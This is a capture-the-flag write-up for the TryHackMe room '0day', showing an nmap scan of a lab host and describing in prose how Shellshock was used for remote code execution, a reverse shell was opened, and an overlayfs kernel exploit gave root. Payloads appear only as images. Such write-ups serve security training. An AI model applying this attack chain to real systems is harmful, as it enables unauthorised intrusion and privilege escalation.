Summary -
Pretty fun room which involves a pretty famous vulnerability named as Shellshock. And once we get initial access to machine we can enumerate and get root privileges via overlayfs privilege escalation exploit.
Enumeration -
Nmap, here we go…
nmap scan -
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Nmap 7.92 scan initiated Mon Jan 31 09:40:27 2022 as: nmap -T4 -p- -A -oA port_scan 10.10.152.254
Nmap scan report for 10.10.152.254
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/31%OT=22%CT=1%CU=30604%PV=Y%DS=5%DC=T%G=Y%TM=61F7F75
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=100%GCD=1%ISR=10D%TI=Z%CI=I%TS=8)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 13.80 ms 10.17.0.1
2 ... 4
5 152.29 ms 10.10.152.254
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 31 09:50:56 2022 -- 1 IP address (1 host up) scanned in 628.71 seconds
Looks like 22 ssh and 80 http ports are open. Tried dirbusting and some manual enumeration but no luck on finding any interesting… Nikto showed something interesting tho…
![[nikto]](/assets/img/tryhackme/0day/nikto.png)
Looks like it is vulnerable to shellshock. Let’s research.
https://www.exploit-db.com/docs/48112
Exploitation -
Let’s start http server on port 80 and then we’ll use curl or wget payload to make connection to confirm rce is working or not.
![[request]](/assets/img/tryhackme/0day/request.png)
![[response]](/assets/img/tryhackme/0day/response.png)
Request from server is made… Let’s put a reverse shell… So, we got a shell as www-data user.
Post Exploitation -
Let’s put linpeas and run. linpeas showed we are running pretty old kernel. And a couple of kernel exploits are availabe. overlayfs one worked for me.
![[linpeas]](/assets/img/tryhackme/0day/linpeas.png)
We are getting error on compliling…. Looks like machine’s path is messed up. Let’s see on Google what it is and fix it and then compile and run the exploit.
![[compile_root]](/assets/img/tryhackme/0day/compile_root.png)
And now worked… Yay, we are root!